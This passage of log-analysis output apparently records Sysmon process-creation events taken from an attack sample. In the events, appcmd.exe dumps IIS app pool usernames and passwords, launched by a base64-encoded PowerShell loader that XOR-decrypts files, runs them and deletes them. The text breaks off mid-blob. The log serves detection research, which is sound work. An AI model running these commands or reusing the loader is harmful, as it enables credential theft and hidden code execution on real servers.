Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.822 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0